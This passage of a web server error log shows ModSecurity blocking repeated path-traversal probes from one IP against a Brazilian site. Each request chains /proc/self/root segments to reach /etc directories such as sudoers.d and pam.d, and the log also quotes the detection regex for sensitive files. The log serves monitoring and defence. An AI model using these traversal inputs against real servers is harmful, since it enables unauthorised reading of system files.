"OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldsa4xEDsg_V3ESNY8JgAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:06.949835 2026] [:error] [pid 18709:tid 140411624429312] [client 74.7.243.203:34956] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldsjarLhPAjZGI1b22igAAA44"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:09.419830 2026] [:error] [pid 18380:tid 140411574073088] [client 74.7.243.203:34958] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldta4xEDsg_V3ESNY8KgAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:11.733599 2026] [:error] [pid 18709:tid 140411616036608] [client 74.7.243.203:52846] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldtjarLhPAjZGI1b22jgAAA48"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:14.191690 2026] [:error] [pid 9498:tid 140411641214720] [client 74.7.243.203:52858] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldundMvNrBGNI28whf0gAAAww"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:15.539048 2026] [:error] [pid 18709:tid 140411683178240] [client 74.7.243.203:52866] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablduzarLhPAjZGI1b22jwAAA4c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:17.919337 2026] [:error] [pid 9299:tid 140411624429312] [client 74.7.243.203:52868] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldvb-sgTmmJoPuMdynNQAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:22.900781 2026] [:error] [pid 11293:tid 140411741927168] [client 74.7.243.203:52876] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldwtCmCSWTlPouqorUrgAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:24.221052 2026] [:error] [pid 8555:tid 140411716749056] [client 74.7.243.203:35752] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldxM36KAxay5pmeQfDQQAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:25.420922 2026] [:error] [pid 8856:tid 140411590858496] [client 74.7.243.203:35766] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldxXUHeC6oxrTQ0VC24wAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:30.095164 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.243.203:35780] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldyqBJNF7axNlVR0UE_AAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:31.371826 2026] [:error] [pid 2325:tid 140411582465792] [client 74.7.243.203:50836] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldy-82sZHvlq4xgHrMUAAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:32.718554 2026] [:error] [pid 9155:tid 140411666392832] [client 74.7.243.203:50840] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldzNbI7zhHXcabyMUt3gAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:34.009146 2026] [:error] [pid 7437:tid 140411674785536] [client 74.7.243.203:50850] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldzgeiSKl8TjouI-YJygAAA8g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:35.243400 2026] [:error] [pid 8555:tid 140411624429312] [client 74.7.243.203:50866] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abldz836KAxay5pmeQfDQwAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:37.771989 2026] [:error] [pid 9299:tid 140411624429312] [client 74.7.243.203:50880] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abld0L-sgTmmJoPuMdynOgAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:39.147438 2026] [:error] [pid 2325:tid 140411590858496] [client 74.7.243.203:50882] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abld0-82sZHvlq4xgHrMUwAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:40.351215 2026] [:error] [pid 18709:tid 140411557287680] [client 74.7.243.203:37830] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abld1DarLhPAjZGI1b22lQAAA5Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:44.820160 2026] [:error] [pid 8298:tid 140411725141760] [client 74.7.243.203:37844] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abld2Jdzf3e7m9lz3ZHOzAAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:48.421188 2026] [:error] [pid 1731:tid 140411733534464] [client 74.7.243.203:37860] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abld3Ab2qCuy5irgBMjQ-gAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:49.863414 2026] [:error] [pid 8298:tid 140411616036608] [client 74.7.243.203:37874] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abld3Zdzf3e7m9lz3ZHOzwAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:51.824020 2026] [:error] [pid 2473:tid 140411565680384] [client 74.7.243.203:59448] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abld36BJNF7axNlVR0UFAgAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
